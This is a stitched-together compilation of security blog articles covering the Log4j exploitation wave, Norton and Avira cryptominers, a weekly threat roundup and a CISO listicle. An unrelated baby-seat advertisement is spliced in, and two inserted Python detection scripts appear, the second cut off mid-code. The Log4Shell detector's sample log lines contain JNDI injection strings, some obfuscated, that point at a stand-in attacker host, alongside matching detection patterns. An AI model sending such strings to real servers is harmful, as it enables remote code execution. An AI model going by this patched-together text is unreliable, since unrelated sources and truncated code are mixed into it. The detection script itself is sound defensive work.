Log4j One Month On | Crimeware and Exploitation Roundup

It has been 31 days since the initial public disclosure of a critical remote code execution (RCE) vulnerability in the Apache Log4j logging library that upended enterprise security at the close of 2021. In that time, since the initial CVE-2021-44228 (critical), we have already seen five more related CVEs:

  • CVE-2021-45046 (critical)
  • CVE-2021-4104 (high)
  • CVE-2021-42550 (moderate)
  • CVE-2021-45105 (moderate)
  • CVE-2021-44832 (moderate)

and several updates to the library from 2.15.01 on December 9th to 2.17.1 on December 28th.

The importance of this class of vulnerabilities in such a ubiquitous library must not be forgotten with the next spin of the cyber news cycle: with millions of vulnerable devices, attacks are likely to continue for as long as such devices running unpatched software can be found by threat actors.

In this post, we round up all the activity to date concerning Log4Shell exploits to underscore the importance of timely discovery and patching of affected systems.

Log4j Initial Impact | Criminals and Researchers Equally Alert

As described in more detail here, there are two novel characteristics of a Log4j attack:

  1. The attacking string can be injected into any user input that will be logged such as an http header, a username, or a file name.
  2. The server the attacker communicates with and the server being attacked can be completely different and even located within different networks. In this case, internal logging servers located within trusted networks can suddenly communicate with attackers on the internet.

These characteristics provide a simple and potent tool and it took less than 24 hours after public disclosure of CVE-2021-44228 for attackers to generate over 60 permutations of the attack string.
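A defender-side check for the injection point described above, added here as an example and not code from the original post: it de-obfuscates the nested `${...}` lookup syntax behind the many attack-string permutations and flags JNDI lookups in constructed web access-log lines (the hostnames such as attacker.example are placeholders).

```python
"""Scan log lines for Log4Shell-style JNDI lookups, including disguised forms.

Added example for illustration; the sample log lines below are constructed and
the hosts in them (attacker.example) are placeholders, not real indicators.
"""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no nested "${", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")

# JNDI lookup with any of the transports seen in Log4Shell probes.
_JNDI = re.compile(r"jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Reduce one lookup body the way Log4j 2.x StrSubstitutor would.

    Covers the forms most often used to hide the word 'jndi':
      lower:X / upper:X   -> case conversion of X
      name:-default       -> the default value when the lookup 'name' is unknown
    A jndi lookup is kept intact so the scanner can match it; any other lookup
    is reduced to its literal text so the surrounding line is preserved.
    """
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "jndi":
        return body
    if ":-" in body:
        return body.split(":-", 1)[1]
    if prefix == "lower":
        return rest.lower()
    if prefix == "upper":
        return rest.upper()
    return body


def normalize(text: str) -> str:
    """URL-decode, then collapse nested ${...} lookups until none remain.

    Each pass removes at least one "${" because a replacement never contains
    one, so the loop always terminates.
    """
    text = unquote(text)
    prev = None
    while prev != text:
        prev = text
        text = _INNER.sub(lambda m: _resolve(m.group(1)), text)
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup once de-obfuscated."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (1-based line number, matched 'jndi:<scheme>') for each probe."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((number, match.group(0).lower()))
    return hits


# Constructed access-log lines: a benign request, a plain probe, two disguised
# probes, a URL-encoded probe, and a non-JNDI lookup that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:12:44 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:03:13:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:13:09 +0000] "GET /?x=${${lower:j}ndi:${lower:LDAP}://attacker.example/a} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:03:13:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:rmi://attacker.example/b}"',
    '10.0.0.10 - - [10/Dec/2021:03:13:40 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.11 - - [10/Dec/2021:03:14:00 +0000] "GET /search?q=${java:version} HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, lookup in scan(SAMPLE_LOG):
        print(f"line {number}: {lookup} -> {normalize(SAMPLE_LOG[number - 1])}")
```

Because the attacking string may land in any logged field (headers, usernames, file names), run the scanner over every log source the application writes, not only the access log.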

Within hours of the public disclosure, we saw discussion and adoption of the issue within well-known underground Russian crime forums.

RU forum discussions

Researchers in the Chinese hacking community also claimed to have seen evidence of fast, automated exploitation tools such as Log4j_RCE_Tool and ReverseShell PoCs, along with an increasing number of articles on exploiting additional JNDI vulnerabilities in IBM WebLogic servers.

Meanwhile, researchers found that their Log4j honeypots were lighting up with alarming speed within 24 hours of the initial disclosure.

December 2021 | Log4Shell Attacks In the Wild

The first wave of attacks using the Log4Shell exploit came from relatively unsophisticated actors dropping various cryptominers on victims. Perhaps the most audacious of these was a reported 8-day hack of HP AMD-based 9000 EPYC servers that was used to mine around 3.4 million Raptoreum coins, with an approximate value of $110,000. It is thought that the attackers were able to cash out about half of the coins they mined before the operation was shut down.

Miner attacks were quickly followed with the appearance of a number of new ransomware families taking advantage of Log4j as a means of initial access, such as Khonsari ransomware. Attackers exploited Log4j to download and launch a malicious Java class file, which then retrieved the Khonsari ransomware payload from a C2.

Additional ransomware families soon followed, including TellYouThePass. This family had been relatively dormant prior to the Log4j vulnerability disclosure. TellYouThePass has both Windows and Linux variants, allowing it to attack the majority of servers likely to be vulnerable to Log4j exploitation.

Conti Attacks Log4j-Vulnerable Devices Not Exposed to the Public Internet

Within days of the flaw being disclosed, Conti ransomware campaigns were reportedly observed taking advantage of the vulnerability, with multiple campaigns focused on high-value vCenter environments. This development is noteworthy as the target machines were not necessarily exposed to the public internet. Rather, where the Conti operators had already gained an initial foothold into a target’s network, they exploited Log4j to compromise and encrypt vulnerable vCenter servers within the network.

Naturally, the Emotet crew has been taking advantage of Log4j as well. For example, vulnerable servers were quickly compromised and used for staging and payload hosting within the greater Emotet network. While we fully expect Emotet to embrace Log4j for direct delivery, we have yet to observe this development. However, we do currently see the use of Log4j to deliver Cobalt Strike Beacons, which can then be followed by any number of payloads.

In mid-December, Vietnamese crypto-exchange ONUS was attacked via exploitation of Log4j. The attack likely occurred within two to three days of the initial Log4j disclosure. The company patched their vulnerable servers sometime after the 13th of December, by which time the company had already been breached. The attackers later attempted to extort the company out of $5 million. For that amount, the attackers offered not to leak a cache of stolen data including PII. After the Fintech firm refused to pay, the attackers attempted to sell this data on a well-known hacking forum on December 25th:

Hackers try to sell data from log4j compromise

Ransomware operators and extortionists are not the only ones getting in on the action. The actors behind Dridex have also expediently adopted the use of this exploit for their own nefarious purposes. In mid to late December, we saw mass distribution of Dridex by way of Log4j. In most cases, the exploit was used to load a malicious Java class, followed by a .HTA file containing a VBScript. From there we see more of a standard DLL-based flow.

January 2022 | Regulators and CISA Add Pressure to Remediate Log4j

On January 4th, the pressure for enterprises to ensure they have taken appropriate steps to remediate assets running vulnerable Log4j libraries was ramped up even further by the FTC.

Noting that Log4j “poses a severe risk to millions of consumer products” and that the vulnerability is being widely exploited by a growing set of threat actors, the FTC said on January 4 that it will

“use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j”.

Meanwhile, on Jan 6, 2022 CISA noted that, based on submissions to the agency’s catalog, there are at least 2800 distinct products that contain Log4j. The agency estimates that despite the determined action by many admins and security teams during December 2021, there are likely still “hundreds of millions” of individual devices still affected by the Log4j vulnerabilities.

What Comes After Log4j?

Log4j could be just the beginning of a whole new class of bugs. It turns out that the JNDI API is very attractive as a means of compromise as it allows simple unauthenticated remote code execution. A new JNDI-based “Log4j-like” critical vulnerability was disclosed on Jan 7, 2022. Tracked as CVE-2021-42392, this related RCE flaw was discovered in the console of H2, an open-source relational database management system written in Java. Although far from as widespread as the Log4j vulnerability, it is estimated to affect almost 7000 assets, including popular frameworks like JHipster, Play framework and Spring Boot.

Conclusion

Unfortunately for overworked admins and security teams, a new year doesn’t mean an end to old problems, and exploitation of the Log4j and related JNDI vulnerabilities is going to be haunting many defenders for some time to come. Again, we urge all to stay ahead of the Log4j situation and ensure vulnerable software is patched to the latest version of Log4j or removed where that is not possible.

If there’s any silver lining to this dark cloud, it is that in order for threat actors to capitalize on vulnerabilities, they need to engage in malicious behaviour, and that’s where on-device, AI-powered endpoint protection comes into its own. Whether it’s cryptominers or malware loaders, ransomware or banking trojans, deploying an autonomous detection and mitigation solution is an essential part of defending the modern organization from compromise.

If you would like to see how SentinelOne can help defend your organization, contact us or request a free demo.


Baby Racing Car Seat From Delta Children

You read it right! Delta Children, the company known and loved for their eye-catching baby chairs and accessories, has created something for the little ones who were born with the speed in their veins.

Delta Children Sit N Play Portable Activity Seat for Babies is what you might call a sporty addition to the baby gear family. It is safe, comfortable, sturdy, and perfectly adjustable to any surface.

About Delta Children Portable Activity Chair

The Delta Children Sit N’ Play Portable Activity Seat will help your little one sit, interact, and play at home and on the road. The sturdy upright seat allows your baby to enjoy and interact with the world completely, while the beautiful design will look great in any room. The portable play seat is easy to fold for storage and take along, while the non-skid bottom will keep it secure on nearly any surface.

Your little one will love playing with the engaging race car-themed toys that help increase gross motor skills, and you’ll love how easy it is to clean–just remove the seat pad and pop it in the washing machine. The rest of the activity seat features water-and-stain-resistant fabric that’s easy to wipe clean!

This infant floor seat is perfect for traveling because of its innovative zippered design and convenient carry handle, which unzips to fold flat quickly.

Why choose a baby racing car seat?

Keeping your baby content in one spot is one of the most challenging tasks when it comes to caring for them. Babies love to move around and explore; they’re constantly crawling everywhere, looking for something they can pick up in their little hands, something that will bring them joy and entertainment.

This is where the Delta Children Sit N’ Play Portable Activity Seat comes in to help you. This product will have your child content on any surface, whether it’s at home or outside, on the porch, for example. You can place it anywhere, and your baby will be thrilled playing with the interactive toys that are included.

It is also vital to consider kids’ interests as soon as possible. You don’t want to wait until they’re older and have become bored with the toys you chose for them during their infantile stage. Let them play with what they enjoy, let them be kids while they still can, and once they get a bit older, things will start getting complicated because of what is expected from them in terms of behavior and maturity.

Quality kids’ chairs at your reach

Besides being a practical solution for your child’s entertainment needs, the Delta Children Sit N’ Play Portable Activity Seat is also very affordable. Now you can have a play seat for your infant that won’t break the bank as it costs just as much as other products on the market today.

Delta Children products were mentioned on ComfyBummy numerous times. You can, for example, see reviews for their amazing kids’ Frozen chairs or explore our guide to the Delta Children’s products.

You’ll never go wrong having Delta Children around. Their products are some of the most durable ones you’ll find, not only when it comes to kids’ furniture but also in terms of toys. Their quality is extremely high while their prices are fair enough that everyone can buy their products. You can find them on Amazon, where you can browse their many items and choose the one you like most.


500M Avira Antivirus Users Introduced to Cryptomining

Many readers were surprised to learn recently that the popular Norton 360 antivirus suite now ships with a program which lets customers make money mining virtual currency. But Norton 360 isn’t alone in this dubious endeavor: Avira antivirus — which has built a base of 500 million users worldwide largely by making the product free — was recently bought by the same company that owns Norton 360 and is introducing its customers to a service called Avira Crypto.

Avira Crypto

Founded in 2006, Avira Operations GmbH & Co. KG is a German multinational software company best known for their Avira Free Security (a.k.a. Avira Free Antivirus). In January 2021, Avira was acquired by Tempe, Ariz.-based NortonLifeLock Inc., the same company that now owns Norton 360.

In 2017, the identity theft protection company LifeLock was acquired by Symantec Corp., which was renamed to NortonLifeLock in 2019. LifeLock is now included in the Norton 360 service; Avira offers users a similar service called Breach Monitor.

Like Norton 360, Avira comes with a cryptominer already installed, but customers have to opt in to using the service that powers it. Avira’s FAQ on its cryptomining service is somewhat sparse. For example, it doesn’t specify how much NortonLifeLock gets out of the deal (NortonLifeLock keeps 15 percent of any cryptocurrency mined by Norton Crypto).

“Avira Crypto allows you to use your computer’s idle time to mine the cryptocurrency Ethereum (ETH),” the FAQ explains. “Since cryptomining requires a high level of processing power, it is not suitable for users with an average computer. Even with compatible hardware, mining cryptocurrencies on your own can be less rewarding. Your best option is to join a mining pool that shares their computer power to improve their chance of mining cryptocurrency. The rewards are then distributed evenly to all members in the pool.”

NortonLifeLock hasn’t yet responded to requests for comment, so it’s unclear whether Avira uses the same cryptomining code as Norton Crypto. But there are clues that suggest that’s the case. NortonLifeLock announced Avira Crypto in late October 2021, but multiple other antivirus products have flagged Avira’s installer as malicious or unsafe for including a cryptominer as far back as Sept. 9, 2021.

Avira was detected as potentially unsafe for including a cryptominer back in Sept. 2021. Image: Virustotal.com.

The above screenshot was taken on Virustotal.com, a service owned by Google that scans submitted files against dozens of antivirus products. The detection report pictured was found by searching Virustotal for “ANvOptimusEnablementCuda,” a function included in the Norton Crypto mining component “Ncrypt.exe.”

Some longtime Norton customers took to NortonLifeLock’s online forum to express horror at the prospect of their antivirus product installing coin-mining software, regardless of whether the mining service was turned off by default.

“Norton should be DETECTING and killing off crypto mining hijacking, not installing their own,” reads a Dec. 28 thread on Norton’s forum titled “Absolutely furious.”

Others have charged that the crypto offering will end up costing customers more in electricity bills than they can ever hope to gain from letting their antivirus mine ETH. What’s more, there are hefty fees involved in moving any ETH mined by Norton or Avira Crypto to an account that the user can cash out, and many users apparently don’t understand they can’t cash out until they at least earn enough ETH to cover the fees.

In August 2021, NortonLifeLock said it had reached an agreement to acquire Avast, another longtime free antivirus product that also claims to have around 500 million users. It remains to be seen whether Avast Crypto will be the next brilliant offering from NortonLifeLock.

As mentioned in this week’s story on Norton Crypto, I get that participation in these cryptomining schemes is voluntary, but much of that ultimately hinges on how these crypto programs are pitched and whether users really understand what they’re doing when they enable them. But what bugs me most is they will be introducing hundreds of millions of perhaps less savvy Internet users to the world of cryptocurrency, which comes with its own set of unique security and privacy challenges that require users to “level up” their personal security practices in fairly significant ways.

The Good, the Bad and the Ugly in Cybersecurity – Week 1

The Good

It sounds like a tagline for the latest scary film: This week…in a holding cell…THE SPINE COLLECTOR!, but this is no work of fiction. We start 2022 with a breakthrough in a real-life cyber mystery that has been puzzling and plaguing the publishing world for years. On Wednesday, news broke that the FBI had arrested a notorious and elusive cyber thief nicknamed “The Spine Collector” at JFK airport.

Filippo Bernardini, a 29 year-old employee of Simon & Schuster, was arrested and taken into custody on suspicion of wire fraud and aggravated identity theft spanning almost five years. Bernardini is believed to have masqueraded as a plethora of different editors, publishers and others in the literary profession over several years with the goal of stealing unpublished books, novels, and manuscripts, including works by bestselling authors such as Margaret Atwood and Ethan Hawke.

According to the charges filed against him, Bernardini had registered nearly 200 typosquatting domains in order to deliver spear-phishing emails to selected targets in the publishing industry. While the Spine Collector successfully stole hundreds of pieces of work, it seems he never attempted to trade or share the works he pirated, and his precise motivations still remain a mystery at this time.

The Spine Collector’s antics, which began around 2017, had become so widespread within the publishing industry that several amateur sleuths had tried to crack the case. There was widespread speculation and suspicion that the thief was an industry insider, and the whole story makes for a fascinating read itself.

That said, what can we learn from this? Nobody is immune from spear-phishing and social engineering, even when immediate financial risk may not seem to be in play. What motivates criminals and fraudsters can sometimes be factors other than money, but our defenses must be in place all the same.

The Bad

This week also saw disclosure of an attack by the Karakurt group on Tourisme Montréal (aka Visit Montreal), which represents 900 tourism industry stakeholders aiming to promote the Canadian city. The attack, which occurred in December, is just one of a number in a recent uptick in Karakurt activity, all of which are primarily targeting businesses in North America.

A spokesperson for Tourisme Montréal stated that they had immediately retained security experts and that they are working to “ensure the integrity and security of our systems.” Given Karakurt’s MO, concerns remain around whether customer PII has been stolen, and the investigation is ongoing.

An image from the Karakurt leaks site

Karakurt appears to operate under a slightly atypical model. Unlike most ransomware groups, they do not attempt to encrypt victim files and instead focus entirely on exfiltration of data and subsequent extortion. Presumably, the gang has decided that there is plenty of profit to be made without the added hassle of dealing with malware (ransomware) or other tactics that would normally trip the alarms of endpoint security controls or cause service disruptions that might attract attention from the authorities.

Karakurt attacks focus heavily on the use of lolbins and COTS (Commercial Off-the-Shelf) tools. In addition, Karakurt will rely on tools like Anydesk or Cobalt Strike for delivery, staging and further lateral movement. The group is also known to purchase access or credentials for target environments (as opposed to initially breaching the target themselves).

Karakurt Extortion note

The takeaway here is that we all need to remain vigilant and keenly observant with regards to the use of non-malware TTPs in extortion attacks. While this is hardly a new message, we cannot remind ourselves too often of the lengths these criminals will go to.

The Ugly

Researchers at Palo Alto have uncovered a formjacking attack in which malicious JavaScript skimmer code is embedded in videos on a website. Other websites that embed the maliciously-crafted video will then in turn become infected with the same skimmer code. Approximately 100 real estate-focused websites appear to have been compromised using this method.

Based on the findings, the skimmer code is designed to extract email addresses, phone numbers, CC track data and other highly sensitive pieces of data. The attackers then exfiltrate any data obtained to their C2 via HTTP.

All in all a stealthy attack, but far from novel. Unfortunately, attacks don’t have to be shiny and new to work: bad guys will keep reusing whatever gets the job done.

To cap off this week, let’s not forget the ongoing Log4j2 issues (CVE-2021-44228, CVE-2021-44832). At the end of December, Log4j version 2.17.1 was released which addresses a newly discovered RCE (remote code execution) exploit. This newer vulnerability is tracked as CVE-2021-44832. We urge all to review their current posture with regards to the Log4j vulnerabilities to ensure they are as safe and protected as possible. As always, you can find the most up to date information on Log4j on our blog here.

The 9 Biggest Cybersecurity Lies Told to CISOs

Cybersecurity can seem like a bit of a zoo these days. There are myriad problems to solve as the landscape changes under our feet with new technologies, evolving business needs, and an attack surface that continues to expand. Into this mix, add more vendors, more consultants and more experts, each with bold statements on how to win the war against cyber threat actors.

Unfortunately, while many of these attempts to make enterprises safer may be genuine, there are a lot of blanket statements out there that can undermine a CISO’s efforts to secure the business. In this post, I will try to tackle the most oft-repeated cybersecurity misconceptions we see thrown at CISOs.

1. Windows Security Is Enough To Secure Your Microsoft Endpoints

Who is the biggest security vendor of them all? Before taking a mental inventory of the major 3rd party players that no doubt immediately spring to mind, it might come as a surprise to realize that they are all outstripped by Microsoft, with its unique position as both OS vendor and vendor of security software for its own OS, variously known as ‘Microsoft Defender’, ‘Windows Defender’, and now ‘Windows Security’.

2021 was another bumper year of Microsoft vulnerabilities, exploits, and breaches, with threat actors taking quick and merciless advantage of Microsoft vulnerabilities in Exchange Server like ProxyLogon and ProxyShell. Those vulnerabilities were followed by PrintNightmare, which in turn was followed by HiveNightmare.

Microsoft Defender did little to halt any of the ransomware attacks by Hafnium and Conti gangs that exploited such vulnerabilities, and the product was itself also in the wars after it was revealed Defender contained a privilege escalation vulnerability for over 12 years.

Recent history suggests that CISOs that rely on an OS vendor to win a fight against ransomware are going to be on the losing side of the battle.

2. Macs are Safe ‘By Design’

Unlike Microsoft, Apple is not in the business of selling security software in an attempt to protect its own products, but it still actively promotes the security of macOS as one of the unique selling points of Macs over other hardware. Accordingly, Apple has a vested interest in discouraging the perception that third party security controls are required for Macs in the enterprise just as much as they are for other endpoints.

Apple admitted earlier this year that macOS does have a problem with malware, and while few companies use Macs as servers or network controllers, thus sparing them the attention of ransomware operators, they are extremely popular among both C-Suite executives and developers. This makes enterprise Macs juicy targets for threat actors interested in high-value targets, and the new macOS malware seen appearing over the last 12 months has mostly been espionage and backdoors directed at specific targets.

Meanwhile, Mac users themselves are largely unaware of the many ways that malware can and does beat the built-in security technologies used by Apple. The Mac’s built-in security relies heavily on code-signing, certificate revocation checks and legacy file signatures. Threat actors have little trouble bypassing these, and, as with Microsoft Windows, the complexity of operating system software ensures that critical bugs need patching on an increasingly frequent basis.

On top of that, the Mac’s built-in security controls offer no visibility to users or admins. As a CISO, how would your admins know if any of the Macs in your fleet were infected with a backdoor, spyware or other macOS malware without external security software to offer that visibility?

3. Prevention Isn’t Possible, and Detection Is Enough

It’s become a trope among legacy AV vendors in their attempts to excuse the failures of AV Suites and EPP to claim that prevention is impossible, and post-infection detection and quarantine is the only realistic goal.

But we are in 2022, we have had machine learning and AI at our disposal for years now, and there is no reason why any CISO should accept that a vendor cannot prevent file-based malware pre-execution or on-execution.

Vendors that rely entirely on signature-based detection should supplement or replace their detection engines with static AI engines that can prevent most types of malicious PE files. More importantly, CISOs should reject vendors that tell them prevention isn’t possible.

4. Zero Trust Is Achievable For Most Organizations

The tried-and-trusted adage that “You are only as strong as your weakest link” gains new poignancy in today’s move to Zero Trust environments. While embracing Zero Trust is a step in the right direction for reducing your attack surface, the reality is that most organizations cannot effectively implement a complete Zero Trust Architecture (ZTA) across multiple assets and security systems.

Organizations should exercise caution when vendors offer a “Zero Trust SKU”. Beyond the marketing spiel, achieving a ZTA security model requires integration across all technologies. There’s no “plug-and-play” way to transform your organization overnight. Indeed, moving from a legacy perimeter-based security model to a ZTA security model is a multi-year journey, while attacks on businesses occur on a daily basis.

ZTA is one piece in the security jigsaw, but enterprises need to cover their rear and have controls in place for when trust is breached, or simply never gained.

Like many developments in enterprise security, ZTA offers promise but it is no panacea. CISOs should beware vendors that tell them ZTA is a magic bullet that can solve all their security headaches.

5. Mobile Security Is Not a Must

Incredibly, there are vendors (and security practitioners) that still haven’t woken up to the reality of mobile devices in the enterprise. Sometimes, humans act like something doesn’t exist if they simply refuse to see it, but we have been checking our business emails and accessing work data from our mobile devices for years now. Most organizations understand that attempts to stop users conducting work tasks on their mobile devices leads to an unacceptable impact on productivity.

The mobile space is dominated by two main OS vendors, Google and Apple, and both understand the necessity of mobile security, although they take very different approaches to it. Recently, Google explained how an iOS zero-day, zero-click vulnerability had compromised Apple users. The technical level is beyond most skilled programmers and security professionals, let alone ordinary users.

Despite that sophistication, that exploit wasn’t developed by a nation-state actor but by the NSO Group, a private enterprise. In such a climate, where profit-driven attackers can invest that level of expertise into compromising our mobile devices, what business with intellectual property to defend, customer data to protect (and regulatory fines to avoid) can afford to pretend that mobile security is optional?

Mobile attacks are real and CISOs should apply mobile threat defense measures to keep track of user and device behavior and actions.

6. Backups Will Protect You Against Ransomware

The world of information security moves fast, and what was true yesterday (or, to be frank, a few years ago now) is not necessarily true today. Cast your mind back to NotPetya and WannaCry in 2017, and the hard-learned lesson that businesses without backups were setting themselves up as hostages to fortune, or rather the misfortune of being hit by ransomware.

The lesson didn’t go unheeded either by businesses or attackers, and by 2019 we saw the first human-operated ransomware gangs – Maze and DoppelPaymer – pivot to the double-extortion method: denial-of-access to files via encryption with the threat of public data leaks on top. Now, backups didn’t get companies off the hook if they valued the privacy of their data.

Double extortion soon became the standard MO for the majority of ransomware gangs, and some even went so far as to threaten to leak the data of clients or to ransom the clients of victim organizations.

Even so, some organizations were prepared to bite the bullet, risk data leakage, recover from backups and deny criminals a pay-day. Unfortunately, this only led the criminals to raise the stakes to triple extortion: on top of the threat of leaked data and file encryption, they started flooding victim companies with DDoS attacks to force them back to the negotiation table.

The lesson for CISOs is this: ransomware operators are flush with cash from previous victims. They can afford to buy large-scale botnets and hit your network with DDoS till you pay; they can afford to buy Initial Access from other criminals, and they can afford to pay human operators (aka “affiliates”) to carry out attacks. Backups mean nothing in today’s double and triple extortion ransomware threatscape. What matters is preventing compromise in the first place.

7. The Ransomware Threat Can Be Solved By Government

We’ve seen multiple worthy and valiant attempts to fight the growing surge in ransomware coming out of the U.S. government’s new focus on cybercrime.

The Colonial Pipeline attack, the JBS meat-supplier attack and others have created a growing concern for enterprises, as they feel they are left alone in the battle to keep our way of life safe. As laudable as the government’s efforts to take action are, cybercriminals are – by their very nature – undeterred by law enforcement.

No sooner had Biden and Putin discussed a crackdown on criminals that attacked healthcare and other critical infrastructure organizations than new groups emerged specifically to do just that. Where some criminals fear to tread, others will happily take their place if they sniff an opportunity to make money. Federal laws don’t exempt us from locking our own doors.

Yes, government help is always welcome. No, government help isn’t going to alleviate the need for enterprises to protect their businesses against crime.

8. You Don’t Need Humans If You Implement Automation

The cybersecurity skills shortage is real, but while automation can make valuable contributions to productivity and efficacy, automation will never replace the human element in the cybersecurity equation.

Risk is not static, and the risk surface constantly grows and changes as organizations mature and expand their businesses. More services, more production servers, more flow, and more customer data make the challenge to reduce risk an ongoing journey rather than a single task that can be completed with some consolidated effort. As there is no silver bullet to understand enterprise risk or quantify the means to keep a business safe, there will always be a need for cybersecurity talent that can innovate, assess and close these gaps.

Attack vectors are also constantly evolving. Three years ago, organizations relied on static analysis of PEs and other executable files to detect and prevent malware. Soon after, we started seeing fileless, script-based attacks and lateral movement attempts successfully penetrating enterprise networks. A massive storm of supply chain attacks, like SolarWinds, Kaseya, and more, has added yet another dimension to risk management. Meanwhile, the ransomware economy created a massive network of affiliates that used new spam techniques to bypass traditional solutions.

Yes, humans need technology to help them scale, maximize productivity, eliminate mundane tasks, and focus on the critical items that need attention, but the best case is that cybersecurity automation shrinks the growing landscape and attack surface, not that it does the analysts’ job for them.

CISOs will still need smart people who can connect, operate and triage all that attackers (with their own automation tools to hand) will continue to throw at us.

9. MDR Is All You Need To Stay Safe

While automation will never replace the need for human analysts, there is a converse to that, too: humans will never be able to detect, respond and remediate identifiable attacks as fast as computers. We need to use our human and computer resources in ways that are appropriate to the tasks each is best suited to.

Humans will do far better at triaging the edge cases, unknowns and false positives, but on-device AI that never sleeps and works at the speed of your CPU will beat attackers much faster than a remote MDR analyst in the cloud getting a delayed and partial feed of your network telemetry.

Yes, MDR offers added-value to a good next-gen AI endpoint protection agent. No, MDR is no substitute for on-device, autonomous protection, as the 2020 MITRE results convincingly proved.

Conclusion

There’s no escaping the fact that cybersecurity is a complex business, but getting the basics right is the first step. Reduce your dependencies on OS vendors, deploy on-device endpoint protection that offers visibility across your entire estate, and retain cybersecurity talent: these are all sound starting points for every CISO.

Meanwhile, try to see through the misconceptions that are passed around on a regular basis. I’ve called out nine of the most common ones I hear in this post, but there are undoubtedly far more howling in the wind. What other well-intentioned statements that do more harm than good are out there? We’d love to hear your thoughts on LinkedIn, Twitter, and Facebook!

Norton 360 Now Comes With a Cryptominer

Norton 360, one of the most popular antivirus products on the market today, has installed a cryptocurrency mining program on its customers’ computers. Norton’s parent firm says the cloud-based service that activates the program and allows customers to profit from the scheme — in which the company keeps 15 percent of any currencies mined — is “opt-in,” meaning users have to agree to enable it. But many Norton users complain the mining program is difficult to remove, and reactions from longtime customers have ranged from unease and disbelief to, “Dude, where’s my crypto?”

Norton 360 is owned by Tempe, Ariz.-based NortonLifeLock Inc. In 2017, the identity theft protection company LifeLock was acquired by Symantec Corp., which was renamed to NortonLifeLock in 2019 (LifeLock is now included in the Norton 360 service).

According to the FAQ posted on its site, “Norton Crypto” will mine Ethereum (ETH) cryptocurrency while the customer’s computer is idle. The FAQ also says Norton Crypto will only run on systems that meet certain hardware and software requirements (such as an NVIDIA graphics card with at least 6 GB of memory).

“Norton creates a secure digital Ethereum wallet for each user,” the FAQ reads. “The key to the wallet is encrypted and stored securely in the cloud. Only you have access to the wallet.”

NortonLifeLock began offering the mining service in July 2021, but the program gained broader attention on Jan. 4 when Boing Boing co-editor Cory Doctorow tweeted that NortonCrypto would run by default for Norton 360 users.

NortonLifeLock says Norton Crypto is an opt-in feature only and is not enabled without user permission.

“If users have turned on Norton Crypto but no longer wish to use the feature, it can be disabled by temporarily shutting off ‘tamper protection’ (which allows users to modify the Norton installation) and deleting NCrypt.exe from your computer,” NortonLifeLock said in a written statement. However, many users have reported difficulty removing the mining program.
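Before following that removal procedure, an administrator will usually want to know which hosts actually carry the miner. The script below is an added example for that check; it is not NortonLifeLock’s code or part of the original article. The only identifier it takes from the page is the file and process name NCrypt.exe. The install directory is not stated on the page, so the search roots are passed in by the caller; the `tasklist` output embedded in the script is constructed sample data in the real `tasklist /fo csv` layout, with an invented NCrypt.exe row and PID.

```python
"""Check a Windows host for Norton Crypto's miner, NCrypt.exe.

Added example, not NortonLifeLock's or the article's code. The only identifier
taken from the page is the file/process name NCrypt.exe; the install directory
is not stated there, so the caller supplies the roots to search. Processes are
read from `tasklist /fo csv`; the sample output below is constructed.
"""
import csv
import io
import os
import subprocess
import tempfile
from typing import Dict, Iterable, List

# Exact basename match: Windows ships ncrypt.dll (the CNG key-storage API library)
# in System32, so a loose "ncrypt" substring match would flag every host.
MINER_NAME = "ncrypt.exe"


def running_miner_processes(tasklist_csv: str) -> List[Dict[str, str]]:
    """Return the rows of `tasklist /fo csv` output whose Image Name is NCrypt.exe."""
    reader = csv.DictReader(io.StringIO(tasklist_csv))
    hits = []
    for row in reader:
        image = (row.get("Image Name") or "").strip()
        if image.lower() == MINER_NAME:
            hits.append({"image": image, "pid": row.get("PID", ""), "mem": row.get("Mem Usage", "")})
    return hits


def miner_files(roots: Iterable[str]) -> List[str]:
    """Walk each root and return every file whose name is NCrypt.exe, case-insensitively."""
    found = []
    for root in roots:
        for dirpath, _subdirs, files in os.walk(root):
            found.extend(os.path.join(dirpath, f) for f in files if f.lower() == MINER_NAME)
    return sorted(found)


def live_tasklist() -> str:
    """Capture `tasklist /fo csv` on a real Windows host; return '' anywhere else."""
    try:
        proc = subprocess.run(["tasklist", "/fo", "csv"], capture_output=True, text=True, check=True)
        return proc.stdout
    except (OSError, subprocess.CalledProcessError):
        return ""


# Constructed sample in the real tasklist CSV layout; the NCrypt.exe row and its PID are invented.
SAMPLE_TASKLIST = (
    '"Image Name","PID","Session Name","Session#","Mem Usage"\n'
    '"System Idle Process","0","Services","0","8 K"\n'
    '"explorer.exe","3312","Console","1","85,204 K"\n'
    '"NCrypt.exe","4321","Console","1","512,100 K"\n'
    '"lsass.exe","688","Services","0","14,560 K"\n'
)


def sample_filesystem_scan() -> List[str]:
    """Build a throwaway tree with one NCrypt.exe and a decoy ncrypt.dll, scan it, return basenames found."""
    base = tempfile.mkdtemp(prefix="ncrypt-demo-")
    miner_dir = os.path.join(base, "Norton", "Crypto")  # assumed layout, not Norton's real install path
    decoy_dir = os.path.join(base, "Windows", "System32")
    os.makedirs(miner_dir)
    os.makedirs(decoy_dir)
    for path in (os.path.join(miner_dir, "NCrypt.exe"), os.path.join(decoy_dir, "ncrypt.dll")):
        open(path, "wb").close()
    return [os.path.basename(p) for p in miner_files([base])]


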